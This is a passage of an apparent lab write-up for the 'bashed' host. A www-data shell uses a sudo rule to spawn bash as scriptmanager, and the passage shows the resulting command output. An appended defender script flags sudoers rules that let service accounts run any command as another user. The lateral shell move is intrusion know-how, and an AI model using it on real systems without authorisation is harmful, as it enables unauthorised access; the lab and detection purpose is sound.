scriptmanager
It was discovered previously that the www-data user can execute any command as the scriptmanager user.
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager bash
sudo -u scriptmanager bash
scriptmanager@bashed:/var/www/html/dev$ whoami
whoami
scriptmanager
scriptmanager@bashed:/var/www/html/dev$ hostname
hostname
bashed
scriptmanager@bashed:/var/www/html/dev$ ifconfig
ifconfig
ens33 link encap:Ethernet HWaddr 00:50:56:b9:1c:78
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: dead:beef::250:56ff:feb9:1c78/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:1c78/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:6312 errors:0 dropped:121 overruns:0 frame:0
tx packets:1407 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:670395 (670.3 KB) TX bytes:1968027 (1.9 MB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:161680 errors:0 dropped:0 overruns:0 frame:0
tx packets:161680 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:11966320 (11.9 MB) TX bytes:11966320 (11.9 MB)
I can just use the sudo privilege to spawn a bash shell as the scriptmanager user.
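
A defender-side check for the misconfiguration used above, added here as an example and not part of the original notes: it scans sudoers text for service accounts that may run ALL commands as another user. The sudoers content, the NOPASSWD tag, the function name and the service-account list are constructed assumptions; only one user specification per line is handled (no aliases or line continuations).

```python
import re

# user host = (runas_user[:runas_group]) [TAG: ...] command[, command ...]
SPEC = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^):]*)(?::[^)]*)?\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)
# Lines that are settings or alias definitions, not user specifications.
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

# Constructed sample, not copied from the host in the write-up.
SAMPLE = """\
# constructed sudoers sample
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(scriptmanager:scriptmanager) NOPASSWD: ALL
backup ALL=(root) /usr/bin/rsync
"""

def unrestricted_runas(sudoers_text, service_accounts):
    """Return rules that let a service account run ALL commands as another user."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP):
            continue
        m = SPEC.match(line)
        if not m or m["user"] not in service_accounts:
            continue
        cmds = [c.strip() for c in m["cmds"].split(",")]
        if "ALL" not in cmds:
            continue  # rule is limited to specific commands
        # No Runas spec means root; "(:group)" keeps the invoking user.
        if m["runas"] is None:
            runas = "root"
        else:
            runas = m["runas"].strip() or m["user"]
        findings.append({
            "user": m["user"],
            "runas": runas,
            "nopasswd": "NOPASSWD:" in m["tags"],
        })
    return findings

if __name__ == "__main__":
    for f in unrestricted_runas(SAMPLE, {"www-data", "backup"}):
        print(f"{f['user']} may run ALL as {f['runas']} (NOPASSWD={f['nopasswd']})")
```

Any hit for a web-server account means a web compromise becomes a shell as the target user; restrict the rule to the specific commands the account needs or remove it.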